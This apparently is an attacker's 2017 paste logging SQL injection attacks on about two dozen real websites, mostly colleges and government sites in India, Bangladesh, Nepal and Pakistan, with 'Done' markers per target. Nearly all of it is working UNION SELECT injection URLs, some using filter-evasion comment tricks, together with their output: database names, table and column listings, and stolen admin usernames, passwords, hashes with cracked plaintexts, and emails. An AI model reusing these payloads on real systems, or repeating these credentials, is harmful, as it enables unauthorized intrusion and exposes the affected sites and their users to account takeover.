sqli_test

Inject

Jul 10th, 2017
  1.  
  2. Targets :
  3. 1. http://ssy.org/detail.php?id=1 --> Done
  4. 2. http://www.ntl.gov.bd/index.php?id=37 --> Done
  5. 3. http://www.jisa.ac.in/gallery.php?id=%27 --> Done
  6. 4. http://www.emmanuelbedcollege.ac.in/gallery.php?id=5 --> Done
  7. 5. https://www.vgu.ac.in/photo-gallery.php?id=1 --> Done
  8. 6. http://www.maldacollege.ac.in/current-news.php?id=35
  9. 7. http://www.firesystemsa.com/news.php?id=6 -->done
  10. 8. http://rrgroup.com.pk/page.php?id=19
  11. 9. http://www.multan.gov.pk/files.php?id=1
  12. 10. http://rismfp.gov.np/content.php?id=326
  13. 11. http://www.kovaidiabetes.in/content.php?id=1 --> done
  14. 11. http://www.berdu.ac.bd/product_view.php?id=33 --> Done
  15. 12. http://sincrono.co.in/constructions/gallery-list.php?id=6
  16. 13. http://www.dreamskitchen.co.in/gallery.php?id=2
  17. 14. https://www.naipunnya.edu.in/view_gallery.php?id=32
  18. 15. http://www.goldengate.edu.np/index.php?option=com_page&task=view&id=12 --> DOne
  19. 16. http://www.goldengate.edu.np/index.php?option=com_page&task=view&id=12 --> Done
  20. 17. http://ilovetrekkingnepal.com.np/index.php?page=testimonies&id=92 --> Done
  21. 18. http://www.baramacollege.ac.in/department.php?id=2
  22. 19. http://www.turnthepage.in/detail.php?bookId=147 --> Done
  23. 20. http://www.mrpc.co.in/users_article.php?id=3 --> Done
  24. 21. http://cvrce.edu.in/photo_gallery.php?id=91
  25. 22. http://wctmgurgaon.org/photo-gallery.php?id=36 --> Done
  26. 23. http://rismfp.gov.np/content.php?id=326 --> done
  27. 24. http://www.moha.gov.np/en/map/contact.php?district=Gulmi
  28.  
  29. 1.http://ssy.org/detail.php?id=-1' UNION SELECT 1,2,3,database(),5,6,7,8,9,10,11,12,13--+
  30. database: joshient_datassy
  31. user: joshient_ssyuser@localhost
  32. version : 5.5.55-cll
  33. https://pastebin.com/0czVr9pm //mero
  34.  
  35. http://ssy.org/detail.php?id=-1' union select 1,2,3,unhex(hex(group_concat(table_name))),5,6,7,8,9,10,11,12,13 from information_schema.tables where table_schema=database()--+
  36. article,audios,careers,category,category_master,centre,city,contact,country,donate_item,donate_master,donations,enquiry,enroll_list,events,faqs,feedback,festivals,guruvani,image_album,item_master,item_master_old,language,level0,level1,level2,level3,level4,level5,livevideo,media,place,registerevent,schedule,schedule_old,serveitems,slider_images,state,step1,step2,step3,step4,st
  37. subcategory,testimonial,type,upnishad,users,video_gallery,videos,wallpaper,wishto_gift
  38.  
  39. http://ssy.org/detail.php?id=-1' union select 1,2,3,unhex(hex(group_concat(column_name))),5,6,7,8,9,10,11,12,13 from information_schema.columns where table_name='users'--+
  40. id,name,email,password,approval
  41.  
  42. http://ssy.org/detail.php?id=-1' union select 1,2,3,password,5,6,7,8,9,10,11,12,13 from users--+
  43. 8881212#@$%
  44.  
  45. http://ssy.org/detail.php?id=-1' union select 1,2,3,email,5,6,7,8,9,10,11,12,13 from users--+
  46. admin@ssy.org
  47.  
  48. http://ssy.org/detail.php?id=-1' union select 1,2,3,name,5,6,7,8,9,10,11,12,13 from users--+
  49. admin
  50.  
  51.  
  52. http://ssy.org/detail.php?id=-1' union select 1,2,3,approval,5,6,7,8,9,10,11,12,13 from users--+
  53. 3
  54.  
  55.  
  56.  
  57.  
  58.  
  59.  
  60.  
  61. 2.
  62. http://www.ntl.gov.bd
  63.  
  64. http://www.ntl.gov.bd/index.php?id=37' order by 12 --+
  65.  
  66. http://www.ntl.gov.bd/index.php?id=-37' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12--+
  67. -> 3
  68. vulnerable column
  69.  
  70. http://www.ntl.gov.bd/index.php?id=-37' UNION SELECT 1,2,database(),4,5,6,7,8,9,10,11,12--+
  71. ->ntlgov_xcnmuytg
  72.  
  73. http://www.ntl.gov.bd/index.php?id=-37' UNION SELECT 1,2,user(),4,5,6,7,8,9,10,11,12--+
  74. -> ntlgov_bngferyx@localhost
  75.  
  76. http://www.ntl.gov.bd/index.php?id=-37' UNION SELECT 1,2,version(),4,5,6,7,8,9,10,11,12--+
  77. -> 5.6.35
  78.  
  79. http://www.ntl.gov.bd/index.php?id=-37' UNION SELECT 1,2,unhex(hex(group_concat(table_name))),4,5,6,7,8,9,10,11,12 from information_schema.tables where table_schema=database()--+
  80. -> banner,box,comp_name,image_gellary,left_menu,news,user
  81.  
  82. http://www.ntl.gov.bd/index.php?id=-37' UNION SELECT 1,2,unhex(hex(group_concat(column_name))),4,5,6,7,8,9,10,11,12 from information_schema.columns where table_name='user'--+
  83. -->id,user,pass
  84.  
  85. http://www.ntl.gov.bd/index.php?id=-37' UNION SELECT 1,2,user,4,5,6,7,8,9,10,11,12 from user--+
  86. --> Ntl@2011%
  87.  
  88. http://www.ntl.gov.bd/index.php?id=-37' UNION SELECT 1,2,pass,4,5,6,7,8,9,10,11,12 from user--+
  89. -->NtL@20#I*
  90.  
  91.  
  92.  
  93.  
  94. TArget 3:
  95. http://www.jisa.ac.in/gallery.php?id=%27 order by 10--+
  96. --> 10 columns
  97.  
  98. http://www.jisa.ac.in/gallery.php?id=%27%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10--+
  99. --> column 4 is vulnerable
  100.  
  101. http://www.jisa.ac.in/gallery.php?id=%27 UNION SELECT 1,2,3,database(),5,6,7,8,9,10--+
  102. -->jisa_db
  103.  
  104. http://www.jisa.ac.in/gallery.php?id=%27 UNION SELECT 1,2,3,version(),5,6,7,8,9,10--+
  105. -->5.5.50-cll
  106.  
  107. http://www.jisa.ac.in/gallery.php?id=%27 UNION SELECT 1,2,3,user(),5,6,7,8,9,10--+
  108. --> jisa_root@localhost
  109.  
  110. http://www.jisa.ac.in/gallery.php?id=-%27 UNION SELECT 1,2,3,unhex(hex(group_concat(table_name))),5,6,7,8,9,10 from information_schema.tables where table_schema=database()--+
  111. -->gallery,gallery_more,jisa_enquiry_form,jisa_gallery,jisa_gallery_category,jisa_news_events,jisa_tbl_m_user,tbl_m_user,whats_new
  112.  
  113.  
  114. http://www.jisa.ac.in/gallery.php?id=-%27 UNION SELECT 1,2,3,unhex(hex(group_concat(column_name))),5,6,7,8,9,10 from information_schema.columns where table_name = 'jisa_tbl_m_user'--+
  115. --> USER_ID,STATUS,USER_NAME,USER_PASS,F_NAME,L_NAME,ADDRESS_LINE,CITY_AREA,STATE_ID,DIST_ID,BLOCK_ID,VILL_ID,EMAIL_ID,PHONE_NO,MOBILE_NO,CREATE_DATE_TIME,MODIFY_DATE_TIME,CREATED_BY,SUPPER_ADMIN
  116.  
  117. http://www.jisa.ac.in/gallery.php?id=-%27 UNION SELECT 1,2,3,USER_PASS,5,6,7,8,9,10 from jisa_tbl_m_user--+
  118. -->admin!@#
  119.  
  120. http://www.jisa.ac.in/gallery.php?id=-%27 UNION SELECT 1,2,3,USER_NAME,5,6,7,8,9,10 from jisa_tbl_m_user--+
  121. -->admin
  122.  
  123.  
  124. http://www.jisa.ac.in/gallery.php?id=-%27 UNION SELECT 1,2,3,unhex(hex(group_concat(column_name))),5,6,7,8,9,10 from information_schema.columns where table_name='tbl_m_user'--+
  125. --> ID,USER_NAME,USER_PASS,F_NAME,L_NAME,STATUS,SHOWS
  126.  
  127. http://www.jisa.ac.in/gallery.php?id=-%27 UNION SELECT 1,2,3,unhex(hex(USER_NAME)),5,6,7,8,9,10 from tbl_m_user--+
  128. --> jisa
  129.  
  130. http://www.jisa.ac.in/gallery.php?id=-%27 UNION SELECT 1,2,3,unhex(hex(USER_PASS)),5,6,7,8,9,10 from tbl_m_user--+
  131. --> 650855ed68c9d033bf0ffbcd462f2e2b
  132.  
  133.  
  134.  
  135. Target 4:
  136. http://www.emmanuelbedcollege.ac.in/gallery.php?id=-5' UNION SELECT 1,2,3,4,5--+
  137. ->2
  138.  
  139. http://www.emmanuelbedcollege.ac.in/gallery.php?id=-5' UNION SELECT 1,database(),3,4,5--+
  140. --> emma0812_BeDCol
  141.  
  142. http://www.emmanuelbedcollege.ac.in/gallery.php?id=-5' UNION SELECT 1,user(),3,4,5--+
  143. --> emma0812_AdMi12@localhost
  144.  
  145. http://www.emmanuelbedcollege.ac.in/gallery.php?id=-5' UNION SELECT 1,version(),3,4,5--+
  146. --> 5.6.35
  147.  
  148.  
  149. http://www.emmanuelbedcollege.ac.in/gallery.php?id=-5' UNION SELECT 1,unhex(hex(group_concat(table_name))),3,4,5 from information_schema.tables where table_schema=database()--+
  150. --> emc_admin_login,emc_configure,emc_news_updates,emc_photo_category,emc_photo_gallery
  151.  
  152.  
  153.  
  154. http://www.emmanuelbedcollege.ac.in/gallery.php?id=-5' UNION SELECT 1,unhex(hex(group_concat(column_name))),3,4,5 from information_schema.columns where table_name = 'emc_admin_login'--+
  155. --> ad_id,ad_user,ad_password,ad_status
  156.  
  157. http://www.emmanuelbedcollege.ac.in/gallery.php?id=-5' UNION SELECT 1,unhex(hex(ad_user)),3,4,5 from emc_admin_login--+
  158. --> admin
  159.  
  160. http://www.emmanuelbedcollege.ac.in/gallery.php?id=-5' UNION SELECT 1,unhex(hex(ad_password)),3,4,5 from emc_admin_login--+
  161. --> admin2601
  162.  
  163.  
  164.  
  165. Target 5:
  166.  
  167. https://www.vgu.ac.in/photo-gallery.php?id=-1'UNION SELECT 1,2,3,4,5,6--+
  168. --> 2
  169.  
  170. https://www.vgu.ac.in/photo-gallery.php?id=-1'UNION SELECT 1,database(),3,4,5,6--+
  171. --> vguac_web
  172.  
  173. https://www.vgu.ac.in/photo-gallery.php?id=-1'UNION SELECT 1,user(),3,4,5,6--+
  174. --> vguac_webuser@localhost
  175.  
  176. version ;5.5.55-cll
  177.  
  178.  
  179. https://www.vgu.ac.in/photo-gallery.php?id=-1'UNION SELECT 1,unhex(hex(group_concat(table_name))),3,4,5,6 from information_schema.tables where table_schema=database()--+
  180. --> admission_query,admission_query_leads,contactus,events,gallery_album,gallery_album_images,header_notification,login_user,management_lp,news_placement,online_admission,rajeshthan_board,register,tbl_user,ug_lp,ug_lp_leads
  181.  
  182.  
  183. https://www.vgu.ac.in/photo-gallery.php?id=-1'UNION SELECT 1,unhex(hex(group_concat(column_name))),3,4,5,6 from information_schema.columns where table_name='login_user'--+
  184. -> id,username,password,created
  185.  
  186.  
  187. https://www.vgu.ac.in/photo-gallery.php?id=-1'UNION SELECT 1,unhex(hex(username)),3,4,5,6 from login_user--+
  188. -->admin
  189.  
  190. https://www.vgu.ac.in/photo-gallery.php?id=-1'UNION SELECT 1,unhex(hex(password)),3,4,5,6 from login_user--+
  191. -> 5fec4ba8376f207d1ff2f0cac0882b01 --> admin!@#
  192.  
  193.  
  194.  
  195. Target 6:
  196. http://www.maldacollege.ac.in/current-news.php?id=-35 UNION SELECT 1,2,3,4 --+
  197. --> 2,3,4
  198.  
  199. http://www.maldacollege.ac.in/current-news.php?id=-35 UNION SELECT 1,version(),3,4 --+
  200. --> 5.5.45-37.4
  201.  
  202. http://www.maldacollege.ac.in/current-news.php?id=-35 UNION SELECT 1,database(),3,4 --+
  203. --> maldacol_maldacollege
  204.  
  205. http://www.maldacollege.ac.in/current-news.php?id=-35 UNION SELECT 1,user(),3,4 --+
  206. --> maldacol_test@localhost
  207.  
  208.  
  209. http://www.maldacollege.ac.in/current-news.php?id=-35 UNION SELECT 1,unhex(hex(group_concat(table_name))),3,4 from information_schema.tables where table_schema=database()--+
  210. --> admission_notice,album,alumni_detail,archive,change_banner,deprtment_faculty,examination,faculty_assignment,faculty_event,faculty_table,
  211. feedback_details,image_upload,imp_links,index_banner,index_body,indexnews,internal_notice,newpages,news,non_teaching,notice_upload,pdesk,phone,photo_gallery,question_paper,
  212. self_study,seo,sms,student_information,sub_nav,tender_table,third_nav,top_nav,upload_results,user_annoncement,user_details,user_role
  213.  
  214.  
  215. http://www.maldacollege.ac.in/current-news.php?id=-35 UNION SELECT 1,unhex(hex(group_concat(column_name))),3,4 from information_schema.columns where table_name= 'user_details'--+
  216. -->
  217. id,user_unique_id,user_full_name,user_name,user_password,status,user_role,user_email
  218.  
  219. http://www.maldacollege.ac.in/current-news.php?id=-35 UNION SELECT 1,unhex(hex(group_concat(user_name))),3,4 from user_details--+
  220. --> admin , sadmin
  221.  
  222. pass -> 3d7CypONoJmfmQ%3D%3D , 3d7CypONoJmfmQ%3D%3D
  223. email -> suraj.sharma@magicnines.com
  224.  
  225. Target 7:
  226. http://www.firesystemsa.com/news.php?id=-6 UNION SELECT version() --+
  227. --> 5.6.35
  228.  
  229. http://www.firesystemsa.com/news.php?id=-6 UNION SELECT database() --+
  230. --> femv_firesystemsacom
  231.  
  232. http://www.firesystemsa.com/news.php?id=-6 UNION SELECT user() --+
  233. --> femv_fs2011@h2web84.infomaniak.ch
  234.  
  235.  
  236. http://www.firesystemsa.com/news.php?id=-6 UNION SELECT unhex(hex(group_concat(table_name))) from information_schema.tables where table_schema=database() --+
  237. --> accueil,categories_files,categories_organigramme,categories_prestations,categories_regions,contact,membres,
  238. membres_files,news,news_files,news_images,organigramme,prestations,prestations_files,prestations_images,references,
  239. references_images,regions_organigramme,regions_references
  240.  
  241. http://www.firesystemsa.com/news.php?id=-6 UNION SELECT unhex(hex(group_concat(column_name))) from information_schema.columns where table_name='membres' --+
  242. --> id,nom,login,pass
  243.  
  244. http://www.firesystemsa.com/news.php?id=-6 UNION SELECT unhex(hex(login)) from membres --+
  245. --> emilie
  246.  
  247. http://www.firesystemsa.com/news.php?id=-6 UNION SELECT unhex(hex(pass)) from membres --+
  248. --> emilie
  249.  
  250.  
  251.  
  252. Target 8:
  253.  
  254. http://rrgroup.com.pk/page.php?id=-19 UNION SELECT 1,2,3,4,5--+
  255. --> 5,2
  256.  
  257. http://rrgroup.com.pk/page.php?id=-19 UNION SELECT 1,database(),3,4,5--+
  258. --> rrgroupc_webportal
  259.  
  260. http://rrgroup.com.pk/page.php?id=-19 UNION SELECT 1,user(),3,4,5--+
  261. --> rrgroupc_webuser@localhost
  262.  
  263. http://rrgroup.com.pk/page.php?id=-19 UNION SELECT 1,version(),3,4,5--+
  264. --> 5.6.36-cll-lve
  265.  
  266. http://rrgroup.com.pk/page.php?id=-19 UNION SELECT 1,unhex(hex(group_concat(table_name))),3,4,5 from information_schema.tables where table_schema=database()--+
  267. --> adminuser,category,gallery,gallerycontent,menu,news,page,project_page,settings,siteimage,siteimagetype
  268.  
  269. http://rrgroup.com.pk/page.php?id=-19 UNION SELECT 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=0x61646d696e75736572 --+
  270. --> UserID,UserName,Email,Password,IsAdmin
  271.  
  272. http://rrgroup.com.pk/page.php?id=-19 UNION SELECT 1,unhex(hex(UserName)),3,4,5 from adminuser --+
  273. --> admin
  274. http://rrgroup.com.pk/page.php?id=-19 UNION SELECT 1,unhex(hex(Password)),3,4,5 from adminuser --+
  275. --> 7baa5cfe568230421e96c0d326bed94f --> RRG@3F3F
  276.  
  277. Email --> fozia@3ftchnologies.com
  278.  
  279.  
  280. Target 9:
  281. http://www.multan.gov.pk/files.php?id=-1 /**//*!12345UNION SELECT*//**/1,2--+
  282. --> 2
  283. version: 5.5.51-38.2
  284. user: multango_user@localhost
  285. databse: multango_db
  286.  
  287.  
  288.  
  289. Target 10:
  290. http://rismfp.gov.np/content.php?id=-326' +/*!50000UNION*/+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--+
  291. --> 4, 8
  292.  
  293.  
  294.  
  295.  
  296.  
  297. TArget 10:
  298. http://www.mohitminerals.in/news.php?id=27' /*!50000UNION+*/SELECT 1,2,3,4,5,6,7--+
  299. -->2, 4
  300.  
  301. http://www.mohitminerals.in/news.php?id=27' /*!50000UNION+*/SELECT 1,version(),3,4,5,6,7--+
  302. -->
  303. 5.5.51-38.2
  304.  
  305.  
  306. http://www.mohitminerals.in/news.php?id=27' /*!50000UNION+*/SELECT 1,database(),3,4,5,6,7--+
  307. -->mohitmin_mymin
  308.  
  309.  
  310. user() --> mohitmin_mmnin@localhost
  311.  
  312.  
  313.  
  314. http://www.mohitminerals.in/news.php?id=27' /*!50000UNION+*/SELECT 1,table_name,3,4,5,6,7 from /*!information_schema*/.tables where table_schema = database()--+
  315. -->
  316. srs_business
  317.  
  318.  
  319.  
  320.  
  321.  
  322. Target 11:
  323. http://www.kovaidiabetes.in/content.php?id=-1 +UNION+ALL+SELECT+1,2,3,4,5,6--+
  324. --> 5
  325.  
  326. http://www.kovaidiabetes.in/content.php?id=-1 +UNION+ALL+SELECT+1,2,3,4,database(),6--+
  327. --> kovaisug_kovaidia
  328.  
  329. http://www.kovaidiabetes.in/content.php?id=-1 +UNION+ALL+SELECT+1,2,3,4,user(),6--+
  330. --> kovaisug_users@localhost
  331.  
  332. http://www.kovaidiabetes.in/content.php?id=-1 +UNION+ALL+SELECT+1,2,3,4,version(),6--+
  333. --> 5.6.34-log
  334.  
  335. http://www.kovaidiabetes.in/content.php?id=-1 +UNION+ALL+SELECT+1,2,3,4,group_concat(table_name),6 from information_schema.tables where table_schema=database()--+
  336. --> admin,clients,cms,configuration,facilities_details,
  337. facilities_title,gallery_details,gallery_title,news
  338.  
  339. http://www.kovaidiabetes.in/content.php?id=-1 +UNION+ALL+SELECT+1,2,3,4,group_concat(column_name),6 from information_schema.columns where table_name='admin'--+
  340. --> id,username,password
  341.  
  342. http://www.kovaidiabetes.in/content.php?id=-1 +UNION+ALL+SELECT+1,2,3,4,username,6 from admin--+
  343. --> pmgadmin
  344.  
  345. http://www.kovaidiabetes.in/content.php?id=-1 +UNION+ALL+SELECT+1,2,3,4,password,6 from admin--+
  346. --> 2d27ad3469fbd6a5126fbfe64268f3c6 -->083022
  347.  
  348.  
  349.  
  350.  
  351. Target 11:
  352. http://www.berdu.ac.bd/product_view.php?id=-33' UNION SELECT 1,2,3,4,5--+
  353. --> 1,4
  354.  
  355. http://www.berdu.ac.bd/product_view.php?id=-33' UNION SELECT 1,2,3,version(),5--+
  356. --> 5.6.35-log
  357.  
  358. http://www.berdu.ac.bd/product_view.php?id=-33' UNION SELECT 1,2,3,database(),5--+
  359. --> berduac_nduals
  360. --> user: berduac_gfrf2016@localhost
  361.  
  362. http://www.berdu.ac.bd/product_view.php?id=-33' UNION SELECT 1,2,3,group_concat(table_name),5 from information_schema.tables where table_schema= database()--+
  363. --> banner,image_gellary,left_menu,news,rcategory,research,training,user
  364.  
  365.  
  366.  
  367.  
  368. http://www.berdu.ac.bd/product_view.php?id=-33' UNION SELECT 1,2,3,group_concat(column_name),5 from information_schema.columns where table_name='user'--+
  369. --> id,user,pass
  370.  
  371.  
  372.  
  373. http://www.berdu.ac.bd/product_view.php?id=-33' UNION SELECT 1,2,3,user,5 from user--+
  374. --> admin_ber
  375.  
  376.  
  377. http://www.berdu.ac.bd/product_view.php?id=-33' UNION SELECT 1,2,3,pass,5 from user--+
  378. --> ber_u200008
  379.  
  380.  
  381.  
  382. Target 12;
  383. http://sincrono.co.in/constructions/gallery-list.php?id=-6 UNION SELECT 1,2,3,4,5,6--+
  384. --> 2
  385.  
  386. http://sincrono.co.in/constructions/gallery-list.php?id=-6 UNION SELECT 1,version(),3,4,5,6--+
  387. --> 5.6.35-cll-lve
  388.  
  389.  
  390. http://sincrono.co.in/constructions/gallery-list.php?id=-6 UNION SELECT 1,database(),3,4,5,6--+
  391. --> sincrono
  392.  
  393.  
  394. http://sincrono.co.in/constructions/gallery-list.php?id=-6 UNION SELECT 1,user(),3,4,5,6--+
  395. --> sincornouser@localhost
  396.  
  397. http://sincrono.co.in/constructions/gallery-list.php?id=-6 UNION SELECT 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema= database()--+
  398. dotp_billingcode,dotp_common_notes,dotp_companies,dotp_config,dotp_config_list,dotp_contacts,dotp_custom_fields_lists,dotp_custom_fields_struct,dotp_custom_fields_values,dotp_departments,dotp_dotpermissions,dotp_dpversion,dotp_event_queue,dotp_events,dotp_file_folders,dotp_files,dotp_files_index,dotp_forum_messages,
  399. dotp_forum_visits,dotp_f
  400.  
  401. http://sincrono.co.in/constructions/gallery-list.php?id=-6 UNION SELECT 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_name= 'dotp_dotpermissions' --+
  402. --> acl_id,user_id,section,axo,permission,allow,priority,enabled
  403.  
  404.  
  405.  
  406.  
  407.  
  408. Target 13:
  409. http://www.dreamskitchen.co.in/gallery.php?id=2 +/*!UNION*/+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11--+
  410. --> 3
  411.  
  412.  
  413. TArget 14:
  414.  
  415. https://www.naipunnya.edu.in/view_gallery.php?id=-32' +/*!UNION*/+ALL+SELECT+1,2,3,4,5 --+
  416. -->2
  417.  
  418.  
  419.  
  420.  
  421.  
  422.  
  423. Target 15:
  424.  
  425.  
  426. http://www.goldengate.edu.np/index.php?option=com_page&task=view&id=-12' +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9 --+
  427. --> 3, 6
  428.  
  429.  
  430. http://www.goldengate.edu.np/index.php?option=com_page&task=view&id=-12' +UNION+ALL+SELECT+1,2,version(),4,5,6,7,8,9 --+
  431. --> 5.5.42-MariaDB
  432.  
  433. http://www.goldengate.edu.np/index.php?option=com_page&task=view&id=-12' +UNION+ALL+SELECT+1,2,database(),4,5,user(),7,8,9 --+
  434. --> goldenga_ggic : goldenga_user@localhost
  435. admin panel: http://www.goldengate.edu.np/myadmin
  436.  
  437.  
  438. taregt 16: Done
  439.  
  440.  
  441.  
  442. --> goldengate_admin,goldengate_album,goldengate_banner,goldengate_category,goldengate_category_type,goldengate_content,
  443. goldengate_country,goldengate_download,goldengate_faculty,goldengate_grade,goldengate_level,goldengate_news,
  444.  
  445.  
  446. http://www.goldengate.edu.np/index.php?option=com_page&task=view&id=-12' +UNION+ALL+SELECT+1,2,group_concat(column_name) ,4,5,6,7,8,9 from information_schema.columns where table_name='goldengate_admin' --+
  447. --> admin_id,admin_fname,admin_lname,admin_name,password,date,last_login,last_ip,
  448. status,access,email,logo
  449. goldengate_photo,goldengate_result,goldengate_
  450. section,goldengate_settings,goldengate_shift,goldengate_student
  451.  
  452. http://www.goldengate.edu.np/index.php?option=com_page&task=view&id=-12' +UNION+ALL+SELECT+1,2,group_concat(admin_name,': ',password) ,4,5,6,7,8,9 from goldengate_admin--+
  453. --> myadmin : myadmin0987
  454.  
  455.  
  456.  
  457.  
  458.  
  459. TArget 17: done
  460. http://ilovetrekkingnepal.com.np/index.php?page=testimonies&id=-92' +/*!50000UNION*/+ALL+SELECT+1,2,3,4,5,6,7,8--+
  461. --> 4, 6
  462. Database: ilovetr1_data
  463.  
  464. Version:5.5.51-38.2
  465. user:ilovetr1_data@localhost
  466.  
  467. http://ilovetrekkingnepal.com.np/index.php?page=testimonies&id=-92' +/*!50000UNION*/+ALL+SELECT+1,2,3,table_name,5,6,7,8 /*!from*/ /*!12345information_schema.tables*/ /*!50000where+*//*!50000table_schema*/ = database()--+
  468. --> admin
  469.  
  470. http://ilovetrekkingnepal.com.np/index.php?page=testimonies&id=-92' +/*!50000UNION*/+ALL+SELECT+1,2,3,column_name,5,6,7,8 /*!from*/ /*!12345information_schema.columns*/ /*!50000where+*//*!50000table_name*/ = 'admin' limit 1,10--+
  471. --> admin_id
  472.  
  473. http://ilovetrekkingnepal.com.np/index.php?page=testimonies&id=-92' +/*!50000UNION*/+ALL+SELECT+1,2,3,column_name,5,6,7,8 /*!from*/ /*!12345information_schema.columns*/ /*!50000where+*//*!50000table_name*/ = 'admin' limit 2,4--+
  474. --> admin_password
  475.  
  476. http://ilovetrekkingnepal.com.np/index.php?page=testimonies&id=-92' +/*!50000UNION*/+ALL+SELECT+1,2,3,admin_id,5,6,7,8 /*!from*/ admin --+
  477. --> admin
  478.  
  479. http://ilovetrekkingnepal.com.np/index.php?page=testimonies&id=-92' +/*!50000UNION*/+ALL+SELECT+1,2,3,admin_password,5,6,7,8 /*!from*/ admin --+
  480. --> 033856d3cabb789c7550fff9f0c96ec4 --> admin321iltn
  481.  
  482.  
  483.  
  484. TArget 18: Firewall: Blocks IP :D
  485. http://www.baramacollege.ac.in/department.php?id=-2 +/*!50000UNION*/+/*!50000ALL*/+/*!50000SELECT*/+1,2,3--+
  486. --> 2,3
  487. version() --> 5.5.56-cll-lve
  488. user() -->
  489. databse() -->
  490.  
  491.  
  492.  
  493. Target 19: done
  494. http://www.turnthepage.in/detail.php?bookId=-147' +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--+
  495. --> 2,4,9
  496. Version() --> 10.1.25-MariaDB
  497. user() --> turnthep_jyotsna@localhost
  498. databse() --> turnthep_turnthepage
  499.  
  500.  
  501. http://www.turnthepage.in/detail.php?bookId=-147' +UNION+ALL+SELECT+1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.tables where table_schema = database()--+
  502. --> admin,billingaddress,bookcategory,bookorder,bookorder27may,bookpickup,bookpickup27may,bookreview,
  503. books,contact,membershipcat,membershipplan,newsletter,notification,planexpire,purchases,shippingaddress,user
  504.  
  505. http://www.turnthepage.in/detail.php?bookId=-147' +UNION+ALL+SELECT+1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.columns where table_name = 'admin'--+
  506. --> admin_id,FirstName,MiddleName,LastName,MobileNo,username,password
  507.  
  508. http://www.turnthepage.in/detail.php?bookId=-147' +UNION+ALL+SELECT+1,group_concat( username, ' : ', password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from admin--+
  509. --> admin : TVVMVElQQVNT
  510.  
  511. TArget 20: done
  512.  
  513. http://www.mrpc.co.in/users_article.php?id=-3%27 +UNION+ALL+SELECT+1,2,3,4--+
  514. --> 2
  515.  
  516. database --> jadon_mrpc
  517. version --> 5.1.73-community
  518. user --> jadon_mrpc@CloudSun.serversfarm.com
  519.  
  520. http://www.mrpc.co.in/users_article.php?id=-3%27 +UNION+ALL+SELECT+1,group_concat(table_name),3,4 from information_schema.tables where table_schema = database()--+
  521. -->mrpc_admin,mrpc_content,mrpc_district,mrpc_event,mrpc_events,mrpc_feedback,mrpc_member,
  522. mrpc_membership,mrpc_news,mrpc_photo_gallery,mrpc_state,mrpc_user,mrpc_user_article
  523.  
  524. http://www.mrpc.co.in/users_article.php?id=-3%27 +UNION+ALL+SELECT+1,group_concat(column_name),3,4 from information_schema.columns where table_name= 'mrpc_admin'--+
  525. --> id,uname,pass,email
  526.  
  527. http://www.mrpc.co.in/users_article.php?id=-3%27 +UNION+ALL+SELECT+1,group_concat(uname, ' : ' ,pass, ' : ' ,email),3,4 from mrpc_admin--+
  528. --> admin : shin0bi : info.jadontech@gmail.com
  529.  
  530.  
  531. Target21: not done
  532. http://cvrce.edu.in/photo_gallery.php?id=91%27 +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9--+
  533. --> 1
  534.  
  535. database() --> cvrceedu_gicvbhu'@'localhost
  536.  
  537.  
  538.  
  539.  
  540. TArget 22: DONE
  541. http://wctmgurgaon.org/photo-gallery.php?id=-36' +UNION+ALL+SELECT+1,2,3,4,5,6,7--+
  542. --> 3
  543. version() ;User() : database() --> 5.5.55-cll: wctmorg_cog@localhost : wctmorg_db
  544.  
  545. http://wctmgurgaon.org/photo-gallery.php?id=-36' +UNION+ALL+SELECT+1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema = database()--+
  546. --> alumni_registration,career,contact,gallery,getplace,getplacement,innerimages,landing_page_wctm,login,login_user,notice_board,online_enquiry,protection,question_paper,tbl_user
  547.  
  548.  
  549.  
  550. http://wctmgurgaon.org/photo-gallery.php?id=-36' +UNION+ALL+SELECT+1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name= 'login'--+
  551. --> id,pass,email,download
  552. --> wctm101 : wctmgurgaon@gmail.com
  553.  
  554.  
  555.  
  556. http://wctmgurgaon.org/photo-gallery.php?id=-36' +UNION+ALL+SELECT+1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name= 'login_user'--+
  557. --> id,username,password,created
  558.  
  559.  
  560.  
  561. http://wctmgurgaon.org/photo-gallery.php?id=-36' +UNION+ALL+SELECT+1,2,group_concat(username,' : ', password),4,5,6,7 from login_user--+
  562. --> aDmiN : 5d750327786d41f330960062d3c25fd454a33c1e --> admin!@#
  563.  
  564.  
  565.  
  566. target 23:
  567.  
  568. ptpkp.gov.pk/index.php?page=news&id=1 /*!50000uNiOn+*//*!50000sElEcT+*/1,2,3,4,5,6,7--+
  569. --> 2,7,4
  570.  
  571. ptpkp.gov.pk/index.php?page=news&id=1 /*!50000uNiOn+*//*!50000sElEcT+*/1,version(),3,user(),5,6,database()--+
  572. -->ptpkpgov_police : 5.5.51-38.2 : ptpkpgov_police@localhost
  573.  
  574.  
  575.  
  576. TArget 24:
  577.  
  578. http://rismfp.gov.np/content.php?id=-326'+/*!50000UNION*/+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--+
  579. --> 4,8
  580.  
  581.  
  582. http://rismfp.gov.np/content.php?id=-326'+/*!50000UNION*/+ALL+SELECT+1,2,3/*!50000,table_name*/,5,6,7,8,9,10,11,12,13,14,15 /*!50000from+*//*!50000information_schema.*//*!50000tables+*/where /*!50000table_schema*/ = database limit 31,31--+
  583. -->usertable
  584.  
  585. http://rismfp.gov.np/content.php?id=-326'+/*!50000UNION*/+ALL+SELECT+1,2,3/*!50000,column_name*/,5,6,7,8,9,10,11,12,13,14,15 /*!50000from+*//*!50000information_schema.*//*!50000columns+*/where /*!50000table_name*/ ='usertable' limit 1,5 --+
  586. --> usern
  587.  
